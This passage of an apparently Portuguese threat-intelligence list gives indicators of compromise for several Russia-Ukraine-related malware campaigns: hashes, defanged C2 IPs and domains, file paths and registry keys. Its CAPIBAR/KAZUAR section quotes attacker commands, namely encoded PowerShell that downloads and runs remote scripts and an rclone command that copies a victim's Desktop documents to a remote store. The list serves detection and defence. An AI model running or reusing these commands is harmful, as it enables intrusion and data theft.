      • joyful: 7622a8f0bb0b97e17e186758f730af2d - 143cc8dade3ac835c9114333e05544b52dc57a1273cbdd4aca38253a710c92ab
      • judge (LNK-dropper): afa8f2b0ea413c568549360e8dfebe0a -  6cb0ef2538cd074fbcccca5a96bb21538529220eeeeaca63e06a18cbbc6a9eb4
      • jump: ea8c0a9bccd9fd91b78e06a2a58b559b - 430206ba1fbd0c869b71608ad1808febfb067e086d0b330225b5afcddc1af352
      • NTUSER.DAT.TMContainer.f4v: c5ab39da6f015a26edb916a0e37b9d57 - c172c8733c92d914574290eb46d8a6c1b49387d8d4dceafc3e13d953395c9710
      • definite.bmp: b6840f52a5c655d22c70f14333238409 - 1928ea04a52ea5ced87305cc001e693385ecbb8d3b4c64c1288d4b223de841dd
      • dependant.bmp: 7e5ea867d5f4ed45dd26e304cef98678 - 452d40893e9973ec5e4779ea830320d80999b09a36113b7d86de866a02823a3c
      • dentist.bmp: 859278e356de512859cd5bb94d09e9e4 -  dcb69e1c9a6bff950481cf1f493b3e9665133e9afae528f0d38d72e83607a6d0
      • define.bmp: df887652a92d1103d5131aa68757b2cc - 9b81fbe9f7157e7873862fe7fabd9df5fdb8197bf1cc01b5e34cbebf5ff0de13 
      • defeat.bmp: 83b3fd87ee87be5708326f99d4db3bbd - f96489503934b654e00cbd0c48845d66aaf3b91f5bd53fd05d7ecfc48a66dc20
      • decay.bmp: ffb49d24a6691bdb3f5f58a632ac4447 - 1113fc222132460fe481ed0a62fb3fe1426bc920cdb01d334c7a7a6ef952dfee 
      • declared.bmp: 396606ccd506b565d8590cae99be4950 - 7e3cfa63b31ed9e4606e43b29a704924a27b62d6b9a1360b462d9998deed549f 
      • decrease.bmp: 3376d2b5e6f99d68824b93bad33e4884 -    cb81b6516f13844c653a9fcbbbeed099dde5be307ec66523be7678d577dca477
      • defensive.bmp: 9428c3fb7d4ae783a348561d5fa7b39e -    88dc766c51f20c93b670bd67b543b70e8d627c9afc041ee74aa6b64c59eb1c7d 
      • defined.icn: dc7266e0eed4a67e1bea6e044c114387 a2361ca9fd84fd41d62628e2310317831f47f8e973c2bda24dadc0972fb983d6
      • delicacy.bmp: a1b63c92db35c90e1058813919446c21 - 9c724d00f28b3453e283e5b0ef5c8455bb61d4c902c53cfb38f07ffb4e17e18d 
      • des.nds: 20531cf42e4f44a96c4aeb4cd7e2d70e - a0c2429616e7bf8a36951d45cbc72a1eab4d4a1a1e8266753a75bdd683737814
    • Rede:
      • 138[.]197.199.151
      • 139[.]59.166.152
      • 144[.]202.61.174
      • 157[.]245.99.132
      • 159[.]203.11.73
      • 168[.]100.10.184
      • 178[.]62.108.75
      • 192[.]241.133.108
      • 194[.]180.174.73
      • 45[.]61.138.226
      • 45[.]61.139.22
      • 45[.]77.196.211
      • 45[.]77.237.252
      • 66[.]42.102.21
      • 70[.]34.218.135
      • hXXp://138[.]197.199.151/get[.]php
      • hXXp://139[.]59.166.152/get[.]php 
      • hXXp://144[.]202.61.174/get[.]php
      • hXXp://157[.]245.99.132/get[.]php 
      • hXXp://159[.]203.11.73/get[.]php
      • hXXp://178[.]62.108.75/get[.]php 
      • hXXp://192[.]241.133.108/get[.]php
      • hXXp://194[.]180.174.73/1.txt 
      • hXXp://194[.]180.174.73/pswd[.]php
      • hXXp://45[.]77.196.211/get[.]php 
      • hXXp://45[.]77.237.252/get[.]php
      • hXXp://66[.]42.102.21/get[.]php 
      • hXXp://70[.]34.218.135/get[.]php
      • hXXps://45[.]61.138.226 
      • hXXp://atlantar[.]ru/get.php
      • hXXp://motoristo[.]ru/get.php 
      • hXXp://lover.printing82.detroito[.]ru/DESKTOP-P5BRFLE/luncheon.nab
      • moolin[.]ru 
      • atlantar[.]ru
      • bubenci[.]ru
      • callsol[.]ru
      • clipperso[.]ru
      • cooperi[.]ru
      • detroito[.]ru
      • farafauler[.]ru
      • fishitor[.]ru
      • flayga[.]ru
      • ganara[.]ru
      • detroito[.]ru
      • hawksi[.]ru
      • hofsteder[.]ru 
      • kilitro[.]ru
      • kurapat[.]ru
      • leonardis[.]ru
      • lnasfe[.]ru
      • lopasts[.]ru
      • mafirti[.]ru
      • metanat[.]ru 
      • mitlubald[.]ru
      • moolin[.]ru
      • motoristo[.]ru
      • paparat[.]ru
      • pasamart[.]ru
      • qkcew[.]ru 
      • rncsq[.]ru
      • tarlit[.]ru
      • tbwelo[.]ru
      • wicksl[.]ru
      • xcqef[.]ru
  • NikoWiper (ESET)
    • OBS: Não encontrei os IOCs desse malware
  • SwiftSlicer (ESET)
    • 7346E2E29FADDD63AE5C610C07ACAB46B2B1B176
  • RoarBAT (CERT-UA)
      • Arquivos:
        • UpdateRarService: c0a7da9ba353c272a694c2f215b29a63 76f06d84d24d080201afee5095e4c9a595f7f2944d9911d17870653bbfefefe8
        • update1.bat (RoarBat): 6b30bd1ff03098dcf78b938965333f6e 27ff9d3f925f636dcdc0993a2caaec0fa6e05c3ab22700f055353a839b49ab38
        • WinRAR.exe (Command line RAR): 4e75f4c7bcc4db8ff51cee9b192488d6 cb3cc656bb0d0eb8ebea98d3ef1779fb0c4eadcce43ddb72547d9411bcd858bc
      • Hosts:
        • C:\Users\update1.bat
        • UpdateRarService
      • Redes:
        • 188.72.101[.]3
        • 188.72.101[.]4
        • 194.28.172[.]172
        • 194.28.172[.]81
    • PowerMagic e CommonMagic (Kaspersky)
      • Em 21/03/2023 a Kaspersky divulgou que, em Outubro de 2022, diversas organizações do governo de transporte e agricultura nas regiões da Criméia, Donetsk e Lugansk foram alvos de uma campanha de phishing para distribuir o backdoor PowerMagic;
      • Arquivos:
        • новое отмена решений уик 288.zip (new cancellation of resolution local election committee 288.zip) (Lure archives: 0a95a985e6be0918fdb4bfabf0847b5a
        • ecb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip (making changes to several russian federation laws.zip)
        • гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip): 765f45198cb8039079a28289eab761c5
        • цик 3638.zip (central election committee 3638.zip): ebaf3c6818bfc619ca2876abd6979f6d
        • сз 14-1519 от 10.08.22.zip (memo 14-1519 dated 10.08.22.zip): 1032986517836a8b1f87db954722a33f
        • приказ минфина днр № 176.zip (dpr ministry of finance order #176.zip): 1de44e8da621cdeb62825d367693c75e
        • attachment.msi (PowerMagic installer): fee3db5db8817e82b1af4cedafd2f346
        • service_pack.dat (PowerMagic dropper): bec44b3194c78f6e858b1768c071c5db
        • manutil.vbs (PowerMagic loader): 8c2f5e7432f1e6ad22002991772d589b
        • PowerMagic backdoor: 1fe3a2502e330432f3cf37ca7acbffac
        • All.exe (CommonMagic loader): ce8d77af445e3a7c7e56a6ea53af8c0d
        • Clean.exe (CommonMagic cryptography module): 9e19fe5c3cf3e81f347dd78cf3c2e0c2
        • Overall.exe (CommonMagic network communication module): 7c0e5627fd25c40374bc22035d3fadd8 
      • Distribution servers:
        • webservice-srv[.]online
        • webservice-srv1[.]online
        • 185.166.217[.]184
    • BEACON e MICROBACKDOOR (Mandiant)
      • Arquivos usados no ataque de phishing:
        • план евакуації (затверджений сбу 28.02.2022 наказом № 009363677833).rar_pass_123.zip: cd8834da2cfb0285fa75decf6c67d049 (MD5)
        • План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).rar: 3cd599654aff2e432ae3390d33c64f5e (MD5)
        • код доступу.txt: 144ccb808e2d2e1f0119ea2a8f7490bc (MD5)
        • План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe: ea47d88d73fecb1fad1e737f1b373d7f (MD5)
        • Заборгованість по зарплаті.xls: da305627acf63792acb02afaf83d94d1 (MD5)
      • C:\Program Files (x86)\Remote Utilities – Host\ rutserv.exe: 2bb5d5aa07fa2c8e9874c117c8fa51d6 (MD5)
      • Base-Update.exe: 06124da5b4d6ef31dbfd7a6094fc52a6 (MD5) (downloader written in Go)
      • %TEMP%\java-sdk.exe: 36ff9ec87c458d6d76b2afbd5120dfae (MD5)
      • oracle-java.exe: 4a5de4784a6005aa8a19fb0889f1947a (MD5)
      • microsoft-cortana.exe: 6b413beb61e46241481f556bb5cdb69c (MD5)
      • C&Cs server (over TCP):
        • 111.90.151[.]182:5651
        • 111.90.151[.]182:8080
        • 111.90.151[.]182:5555
        • 111.90.151[.]182:4899
        • 194.31.98[.]124:80
        • 194.31.98[.]124:443
    • GRIMPLANT e GRAPHSTEEL (Mandiant / US Cyber Command / CERT-UA)
      • Arquivos usados no ataque de phishing:
        • довідка.zip (translation: Certificate.zip): e34d6387d3ab063b0d926ac1fca8c4c4 (MD5)
        • dovidka.chm: 2556a9e1d5e9874171f51620e5c5e09a (MD5)
      • %STARTUP%\Windows Prefetch.lNk: 8fc42ee971ab296f921bb05633f6b4a6 (MD5)
      • C:\Users\Public\Favorites\desktop.ini: a9dcaf1c709f96bc125c8d1262bac4b6 (MD5) 
      • C:\Users\Public\Libraries\core.dll: d2a795af12e937eb8a89d470a96f15a5 (MD5) (Follow-on payload)
      • client.dll (MICROBACKDOOR backdoor): 047fbbb380cbf9cd263c482b70ddb26f (MD5) 
      • C&C: xbeta[.]online:8443
    • Campanha "Cloaked Ursa" (Unit-42)
      • Samples:
        • 311e9c8cf6d0b295074ffefaa9f277cb1f806343be262c59f88fbdf6fe242517
        • 8902bd7d085397745e05883f05c08de87623cc15fe630b36ad3d208f01ef0596 
        • 47e8f705febc94c832307dbf3e6d9c65164099230f4d438f7fe4851d701b580b 
        • 79a1402bc77aa2702dc5dca660ca0d1bf08a2923e0a1018da70e7d7c31d9417f 
        • 38f8b8036ed2a0b5abb8fbf264ee6fd2b82dcd917f60d9f1d8f18d07c26b1534 
        • 706112ab72c5d770d89736012d48a78e1f7c643977874396c30908fa36f2fed7 
        • c62199ef9c2736d15255f5deaa663158a7bb3615ba9262eb67e3f4adada14111 
        • cd4956e4c1a3f7c8c008c4658bb9eba7169aa874c55c12fc748b0ccfe0f4a59a 
        • 0dd55a234be8e3e07b0eb19f47abe594295889564ce6a9f6e8cc4d3997018839 
        • 60d96d8d3a09f822ded0a3c84194a5d88ed62a979cbb6378545b45b04353bb37 
        • 03959c22265d0b85f6c94ee15ad878bb4f2956a2b0047733edbd8fdc86defc48
      • URLs:
        • hxxp://tinyurl[.]com/ysvxa66c
        • hxxp://t[.]ly/1IFg
        • hxxps://resetlocations[.]com/bmw.htm
        • hxxps://tinyurl[.]com/mrxcjsbs
        • hxxps://simplesalsamix[.]com/e-yazi.html
        • hxxps://www.willyminiatures[.]com/e-yazi.html
      • Endereços de e-mail que enviaram os phishings:
        • dawid.tomaszewski@resetlocations[.]com
        • ops.rejon4@kazmierz[.]pl
    • Corona (CISCO Talos) (IOCs)
      • Arquivos:
        • f11310f075171f8502bcd32dcb2fe5894808b17a37f6fd960fb26653871e7b7d 
        • 6b310bd23806272f6c69b84a0381915f16d705e79ce423f19de940247543c76a 
        • a7b7691baa21ad118348661a035b69605a6efd1cd1fa0fd52e5645c64f5f61e6 
        • 1a0e930fbdab2266e14dc501abdbb5623b5762d687df3670d86bb05f252509ac 
        • 0397c586fa56e672db7f14afa8c19992b6e08ab0c1d282c960df1af26371bd72 
        • ce96fe99ebe30ae44e74c22c0b2a055005d0da131e0082a1c290ddeb79dd1114 
        • 5039d76e697f242c36c5a0ebf7dec127757bc34ddaf33c58251c2798da3ce03e 
        • a58da0e6a20fed03364a0cbae18008eb4f8d6bee7c9f5e8ffcdac34fb823d363 
        • 7e35ce60d80c85e050133de142a3b261160259846c9c967c7b2bb84923328f8c 
        • 27a061daee3ec9cff928b8152159a472797821834a3aa7639749489b90f703c3 
        • c7ec4570524ad59d5bd7a3e8f0d23c8cf05cc0e8a98dcdbec00c9dc075084558 
        • aea76f905b0169e4289895a8d85980896f802fd18fe246a27d601310bfa5905e 
        • 7a9a5317a88afb53b44f6cfed59c48907f63aaa7ef63b1587f990951c423c211 
        • 0f189246247c51a701d5a88a06e1fc4932f333d24d7ff40dc8152ad6224f6ca4 
        • 41f050f3d003edd67ec02710c60a7b4022685465cb61ae37fc0b3193c1dab5cb 
        • 1c118d8fb0be904b129e4552f86cd0b3e239ecd25f4d599c54cc96c1096747af 
        • e41b3bdbfb816d5cfd4b235d2b985894153c41da6726ebfa83e45f3b5b4a1945 
        • 6e6f5bebd6bf0fd0b626d6521cdb4faa06275f558bacd419c76702e2728f734c 
        • dd61887d5cdf361a335fec917cd6d1bb186aad56b1f9f5d09b66355ff7f41751 
        • 40b87c5444e03b6b4f3d38315c1525cedfafc20355fff84502cc594799dc41df 
        • d3f012662c44293ae07d8c763914db18fc9795673da7c1cdc4d862b1a7c887b9 
        • 6837c16dce562abf4c55949cfc8d00b019f7fcc6db6a2e9a71d268312fba813e 
        • f00939201f7e77221e94e917a8e34c3d2143324e02fdf35058526d870a0023a0 
        • 71c0881d35f769fe58c084883d2aaee9ec284fcdc04500e5e5272973dfc78944 
        • 00030b0db567afa524eb68faf6f194f25bc5361c380599668a82dbae12af088e 
        • a7a7c4062ced46275638719c100ea2397c673148e8473e56a3ec4313ca7dc5f9 
        • 4d9cca1d75d4691e794dfe9efb9eef6e9e64b4e978ad17831b459d4bb6722829 
        • 4da99f963c26bcc4537ba0437c9cc1445be8bea64067d34308dda6c2e49c8c65 
        • 4cedec3e1a2f72a917ad9a59ebe116ed50c3268567946d1e493c8163486b888b 
        • df33b1187c20582560ffaa1c3e86b92003c4a7c8a61acbbe886ab195531c5c89 
        • bec98a8a5e6786ef415a7a7bf7e60cbd384d43ede4e882aa560fdcb24865ac55 
        • 00fdb03518c238dc649a39e94f0bcc95dacf3b832979d14d0ed5194b9b482b87 
        • 991a19fb00cda372dd1ce4a42580dc40872da5c5bfbb34301615f3870ea3fb58 
        • 2c5ba56a41f40bac2f21065fb9883545ef8d359883cb7bc351c481cb9542e104 
        • 44fd895174a7c1c0019fc95bb04201106dc165704c70e902e3de58db98f03c7e 
        • 30d46a740e2677c8fee383c2a4762561a10c66c5b99215262e42bfabf6bfb1aa 
        • 924d3589d642e8fd65746dc156ff9f104d43114a04ea9509f51ee6a439d1915b 
        • ecafe10f0f7d6a9ae94d9735b45f88492b6ea11ff58f37e62fbf7070778af20a 
        • bc92a5b1c4205ea1fbfec9144b8aab485e095142c7105c9d616b089ec668f198 
        • ea5a8f1052e40cb6bcebf384fe67a6920b3651fbd8f3a34a844f39789ebc4d5f 
        • ad8e3ebd496fb4d97e5075adb4f2f1b91195cca059800d0acd182a07698c13b6 
        • 3670115fa5fac918ad0dafe399568788690f0f205dd0bebe4f55180fd70d36e9 
        • 5969180b072703709764d1ca40be3eeb40f2eb0090859b3743cc21b884fa2106 
        • a5fb6b9417e50bd2260afdcdb5a9eed33e48a283a51408344a4caa2b1025b9a7 
        • c0c455cd3e18be14d2e34cf4e3fb98e7ab0a75ef04b6049ff9f7b306d62704b8 
        • 0f3bdbc64446555c6ff611b02f2e64250fcaf39b78237ae4cca7c74d94731b32 
        • 35d1e819d2ac2535f0aa9e2294570135f37519386872c415e326146e931b8fb9 
        • 5a4bd78a4d3d1a772e9e9b14983646a4c1c6a25cc983b804e4522774ebfa1c14 
        • c40e6b176ad3fd7332cd217191e557352ef4b82bf91f29939121267598737990 
        • e9bbe7c6705a6f5a78c2a9b8060a7e32374b81058f7c2f24851c4d1ea38d7411 
        • 73a21c1492996794688d9751edd1e5c287da645fa7a960e945bb4ea69855424a 
        • 7893965d1861c712b751bc2d5fb53a34ec0d276bcf389b7fc574728940575152
      • everything-everywhere.at.ply[.]gg
      • IP: 94.131.108.[]109 
      • Domínios:
        • hxxps[://]wuzhenfestival[.]site/5109c46d40f801a862c96e628f83faca[.]png 
        • hxxps[://]onyangdol[.]site/thumb_d_F3D14F4982A256B5CDAE9BD579429AE7[.]jpg
        • hxxps[://]kebhana[.]site/Believe-Me-Lyrics[.]jpg
        • hxxps[://]wordrow[.]website/pictures-91[.]jpg
        • hxxps[://]ellechina[.]online/01_logo_HLW-300x168[.]jpg 
        • hxxps[://]sellmyhousequickly[.]website/dangjiansigeyishibiaoyuxuanchuanguahua[.]jpg
        • hxxps[://]frivol[.]space/memnet-profiles/A10818[.]jpg 
        • hxxps[://]wordrow[.]website/pictures-91[.]jpg 
        • hxxps[://]simplifymedia[.]pw/images/bnd/news/23908t5[.]png 
        • hxxps[://]hssenglish[.]pw/fonini/pundit/leaf_background[.]jpg 
        • hxxps[://]mingxing[.]pw/content/_processed_/f/a/_742fa0bbd1[.]jpg 
        • hxxps[://]mingxing[.]pw/datastream/thumb_b/43950sec[.]jpg 
        • hxxps[://]carpetmarker[.]pw/images/Carpet_Shop_3b09adf[.]jpg 
        • hxxps[://]bourns[.]space/p/covers/assets/images/lee-leopard[.]jpg
    • CAPIBAR e KAZUAR (CERT-UA#6981)
      • Arquivos:
        • localhost.mof (CAPIBAR server (MOF)): cdf7fa901701ea1ef642aeb271c70361 1c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc 
        • Pending.mof (CAPIBAR server (MOF)): 153b713b3c6e642f39993d65ab33c5f0 5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e
        • Server.dll (CAPIBAR server): 9ececb4acbf692c2a8ea411f2e7dd006 07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57
        • Control.dll (CAPIBAR): 5c7466a177fcaad2ebab131a54c28fab bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76
        • logon.aspx: b63c2ec9a631e0217d39c4a43527a0ce 1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3
        • logon[1].aspx: 420b7dc391f2cb0a9a684c1c48c334e2 01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7
        • logon[1].aspx: 491e462bf1213fede82925dea5df8fff ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39
        • SYNC[1]: 9dd2bea4f2df8d3ef51dc10c6db2e07a aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe
        • wp-file-script.js: 8c56c22343853d3797037bdac2cec6c7 d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f
        • Control.dll (CAPIBAR): 17402fc21c7bafae2c1a149035cd0835 19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452
        • Control.dll (CAPIBAR): d3065b4b1e8f6ecb63685219113ff0b8 4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947
        • two.exe (CAPIBAR): 5210b3d85fd0026205baee2c77ac0acd 64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a
        • Config.dat: 4065e647380358d22926c24a63c26ac4 5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd
        • Senatorial.exe (KAZUAR): 11a289347b95aab157aa0efe4a59bf24 91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233
        • 1.ps1: cba1f4c861240223332922d2913d18e5 b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8
        • message (Steel Signal's "config.json", "db.sqlite"): 65102299bf8d7f0129ebbcb08a9c2d98 8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8
      • Arquivos:
        • C:\Windows\System32\config\systemprofile\AppData\Roaming\ASKOD\localhost.mof 
        • C:\Windows\System32\config\systemprofile\AppData\Roaming\ZOV\localhost.mof 
        • C:\Windows\System32\Configuration\Pending.mof
        • C:\ProgramData\ASUS\ASUS System Control Interface\AsusSoftwareManager\Config.dat 
        • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\8HIA0N4E\logon[1].aspx 
        • %LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\__AssemblyInfo__.ini 
        • %LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\logon.aspx 
        • %LOCALAPPDATA%\Microsoft\OneDrive\Update\UpdateService.exe 
        • %LOCALAPPDATA%\Microsoft\OneDrive\Update\rclone.conf 
        • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\UOIQCADZ\SYNC[1] 
        • powershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQAZgBpAGwAZQA9ACQAdwAuAEQAbwB3AG4ATABvAGEAZABTAHQAUgBpAE4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBkAGUAbABhAGkAZABhAC4AdQBhAC8AcABsAHUAZwBpAG4AcwAvAHYAbQBzAGUAYQByAGMAaAAvAHcAcAAtAGMAbwBuAGYAaQBnAC0AdABoAGUAbQBlAHMALgBwAGgAcAAnACkAOwBpAEUAeAAgACQAZgBpAGwAZQA= 
        • powershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFcAZQBiAEMATABpAGUATgB0ADsAJABpAHUAYQBXAD0AJABHAHIAcQBkAHEAdwBkAGUALgBEAE8AdwBOAEwATwBhAEQAUwB0AFIAaQBOAGcAKAAnAGgAVAB0AFAAcwA6AC8ALwBhAGwAZQBpAG0AcABvAHIAdABhAGQAbwByAGEALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AcwBsAGkAZABlAHMAXwBsAG8AZwBvAC8AJwApADsAYABpAG4AdgBPAGAASwBlAGAALQBgAEUAeABgAFAAcgBlAHMAcwBgAEkAbwBgAE4AIAAkAGkAdQBhAFcA
        • $w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg('hxxps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php');iEx $file $Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=
        • $Grqdqwde.DOwNLOaDStRiNg('hxxPs://aleimportadora[.]net/images/slides_logo/');invOKe-ExPressIoN $iuaW "C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\UpdateService.exe" "copy" "C:\Users\%USERNAME%\Desktop" "remote:%COMPUTERNAME%\Desktop" "--include" "*.{{jpe?g|txt|docx?|rtf|pdf|xlsx?|xlsm|pptx?|zip|rar|7z}}" "-M" "--max-size" "50M" "--max-age" "200d" "--bwlimit" "1M:1M" "--order-by" "modtime,desc" "--log-file=C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\log_1.dat" "-vv"
        • \Mozilla\Updates Firefox Browser (Scheduled Task) 
        • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling 
        • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness 
        • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness1 
        • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness2 
        • HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBarApi\GameBarId 
        • HKEY_CURRENT_USER\Software\Classes\CLSID\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\InprocServer32\1.0.0.0\CodeBase 
        • HKEY_CURRENT_USER\Software\Classes\CLSID\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\ScriptletURL HKEY_CURRENT_USER\Software\Classes\CLSID\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\ScriptletURL Мережеві:
      • Domínios:
        • hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-plugins.php 
        • hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php 
        • hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-file-script.js 
        • hXXps://atomydoc[.]kg/src/open_center/
        • hXXps://atomydoc[.]kg/src/open_center/?page=ccl 
        • hXXps://atomydoc[.]kg/src/open_center/?page=fst 
        • hXXps://atomydoc[.]kg/src/open_center/?page=snd 
        • hXXps://atomydoc[.]kg/src/open_center/?page=trd 
        • hXXps://aleimportadora[.]net/images/slides_logo/ 
        • hXXps://aleimportadora[.]net/images/slides_logo/?page= 
        • hXXps://aleimportadora[.]net/images/slides_logo/fg/message 
        • hXXps://aleimportadora[.]net/images/slides_logo/fg/music 
        • hXXps://aleimportadora[.]net/images/slides_logo/fg/video 
        • hXXps://aleimportadora[.]net/images/slides_logo/index.php 
        • hXXps://octoberoctopus.co[.]za/wp-includes/sitemaps/web/ 
        • hXXps://sansaispa[.]com/wp-includes/images/gallery/ 
        • hXXps://www.pierreagencement[.]fr/wp-content/languages/index.php 
        • hXXps://mail.aet.in[.]ua/outlook/api/logon.aspx 
        • hXXps://mail.kzp[.]bg/outlook/api/logon.aspx 
        • hXXps://mail.numina[.]md/owa/scripts/logon.aspx (CAPIBAR C2URL) 
        • hXXps://mail.aet.in[.]ua/outlook/api/logoff.aspx (CAPIBAR C2URL) 
        • hXXps://mail.arlingtonhousing[.]us/outlook/api/logoff.aspx (CAPIBAR C2URL) 
        • hXXps://mail.kzp[.]bg/outlook/api/logoff.aspx (CAPIBAR C2URL) 
        • hXXps://mail.lechateaudelatour[.]fr/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL) 
        • hXXps://mail.lebsack[.]de/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)
    • Infamous Chisel (NCSC)
      • Domain: www[.]geodatatool[.]com
      • C2 communication: POST /server[.]php?ver=16&bid=%s&type=%d HTTP/1.1\r\n User-Agent: curl/7.47\r\n
      • Paths:
        • /system/bin/netd_
        • /data/local/tmp/.syscache.csv
        • /data/local/tmp/.syspackages.csv
        • /data/local/tmp/.sysinfo.csv
        • /data/local/tmp/.aid.cache
        • /data/local/tmp/.android.cache.sh
        • /sdcard/Android/data/.google.index
        • /storage/emulated/0/Android/data/.google.index
        • /storage/emulated/1/Android/data/.google.index
        • /data/local/td
        • /data/local/prx.cfg
        • /data/local/prx
        • /data/local/prx/cached-certs
        • /data/local/prx/cached-microdesc-consensus
        • /data/local/prx/cached-microdescs
        • /data/local/prx/cached-microdescs.new
        • /data/local/prx/lock
        • /data/local/prx/state
        • /data/local/prx/hs
        • /data/local/prx/hs/hostname
        • /data/local/prx/hs/hs_ed25519_public_key
        • /data/local/prx/hs/hs_ed25519_secret_key
        • /data/local/blob
        • /data/local/killer
        • /data/local/db
        • /data/local/NDBR_armv7l
        • /data/local/NDBR_i686
    • MerlinAgent (Securonix)
      • Arquivos:
        • Інфо про навчання по БПЛА для військових.v2.2.chm: 68A224AD49F2BD3D82EF6FCF5B16472DD06FECFF816263925DFB9BAC91951B21 (SHA-256)
        • g1h7zr.bin:  46FA63AF33FB7A42D3F79ED81D38E5CADDA7D311B07B2306E917179948189C7A (SHA-256)
        • ctlhost.exe: 4659D371C9B6DB1687D6DD027E95563DA88A29378DE4F87DB19B267859D04D03 (SHA-256)
      • C2 Address:
        • catbox[.]moe
        • listen[.]servemp3[.]com
        • 168[.]100[.]8[.]245
    • LittleDrifter (Checkpoint)
      • Samples (MD5)
        • cbeaedfa84b02a2bd41a70fa92a46c36
        • 6349dd85d9549f333117a84946972d06
        • 2239800bfc8fdfddf78229f2eb8a7b95
        • 42bc36d5debc21dff3559870ff300c4e 
        • 4c2431e5f868228c1f286fca1033d221
        • 1536ec56d69cc7e9aebb8fbd0d3277c4 
        • 49d1f9ce1d0f6dfa94ad9b0548384b3a
        • 83500309a878370722bc40c7b83e83e3 
        • 8096dfaa954113242011e0d7aaaebffd
        • bbb464b327ad259ad5de7ce3e85a4081 
        • cdae1c55ec154cd6cef4954519564c01
        • 2996a70d09fff69f209051ce75a9b4f8 
        • 9d9851d672293dfd8354081fd0263c13
        • 96db6240acb1a3fca8add7c4f9472aa5 
        • 1c49d04fc0eb8c9de9f2f6d661826d24
        • 88aba3f2d526b0ba3db9bc3dfee7db39 
        • 86d28664fc7332eafb788a44ac82a5ed
        • 1da0bf901ae15a9a8aef89243516c818 
        • 579f1883cdfd8534167e773341e27990
        • 495b118d11ceae029d186ffdbb157614
      • Infrastrutura:
        • ozaharso[.]ru
        • nubiumbi[.]ru
        • acaenaso[.]ru
        • atonpi[.]ru
        • suizibel[.]ru
        • dakareypa[.]ru
        • ahmozpi[.]ru
        • nebtoizi[.]ru
        • squeamish[.]ru
        • nahtizi[.]ru
        • crisiumbi[.]ru
        • arabianos[.]ru 
        • gayado[.]ru
        • quyenzo[.]ru
        • credomched[.]ru
        • lestemps[.]ru
        • urdevont[.]ru
        • hoanzo[.]ru 
        • absorbeni[.]ru
        • aethionemaso[.]ru
        • aychobanpo[.]ru
        • ayzakpo[.]ru
        • badrupi[.]ru 
        • barakapi[.]ru
        • boskatrem[.]ru
        • brudimar[.]ru
        • decorous[.]ru
        • dumerilipi[.]ru 
        • heartbreaking[.]ru
        • judicious[.]ru
        • karoanpa[.]ru
        • lamentable[.]ru
        • procellarumbi[.]ru
        • ragibpo[.]ru
        • raidla[.]ru
        • ramizla[.]ru
        • samiseto[.]ru
        • superficial[.]ru
        • talehgi[.]ru
        • undesirable[.]ru
        • valefgo[.]ru
        • vasifgo[.]ru
        • vilaverde[.]ru
        • vloperang[.]ru
        • zerodems[.]ru 
        • geminiso[.]ru
        • boskatrem[.]ru 
        • sabirpo[.]ru
        • vloperang[.]ru 
        • decorous[.]ru
        • ramizla[.]ru
        • procellarumbi[.]ru
        • andamanos[.]ru
        • triticumos[.]ru
    • LONEPAGE (Deep Instinct)
      • Rede:
